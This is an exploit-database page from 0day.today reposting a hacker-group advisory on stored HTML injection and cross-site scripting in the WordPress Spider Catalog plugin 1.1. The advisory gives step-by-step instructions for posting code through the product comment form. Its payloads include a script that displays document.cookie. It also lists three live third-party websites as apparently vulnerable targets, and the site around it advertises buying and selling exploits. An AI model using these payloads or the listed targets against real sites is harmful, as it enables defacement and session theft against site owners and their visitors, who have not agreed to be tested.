0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress Plugin Catalog HTML Code Injection and Cross-site scripting
[ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm D4NB4R member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#Exploit Title: Wordpress Plugin Catalog HTML Code Injection and Cross-site scripting
Dork: N/A
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://wordpress.org/extend/plugins/catalog/
Version: 1.1
License: Non-Commercial
Demo: http://www.web-dorado.com/products/wordpress-catalog.html
Download: http://downloads.wordpress.org/plugin/catalog.zip
Tested on: [Linux(Arch)-Windows(7ultimate)]
Descripcion:
Spider WordPress Product Catalog plugin is a convenient tool for organizing the products represented on
your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes
it easier for the customers to search and identify the needed products within the WordPress catalog. It
is possible to add an unlimited number of parameters for each of the categories in the catalog in order to
allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can
be accompanied with an image.
Vulnerable Parameter Name:
?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
The error occurs when sending product reviews "view=showproduct" allowing the attacker
to send code to your liking, not $_POST validate the form this code is stored in the db.
Exploit 1:
HTML Code Injection
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here".
An example of html:
<center><marquee><h1>HTML code Injection Tested By D4NB4R</h1></marquee></center>
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
Exploit 2:
Cross-site scripting
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here".
An example of possible xss:
<script>alert(document.cookie)</script>
<script>alert("Xss by D4NB4R")</script>
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
http://richotoole.com/prairiemtn/catalog/ladies/?s_p_c_t=1342&product_id=5&view=showproduct&page_num=1&back=1
http://floralmodelling.com.ua/%D0%BC%D0%BE%D0%BB%D0%B4%D1%8B?s_p_c_t=1342&product_id=6&view=showproduct&page_num=1&back=1
http://wpdemo.web-dorado.com/catalog/?s_p_c_t=1342&product_id=4&view=showproduct&page_num=1&back=1
Greetz: All Member Inj3ct0r Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha
* shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic
* Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel
* L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects
* aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe
* ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
# 0day.today [2024-10-05] #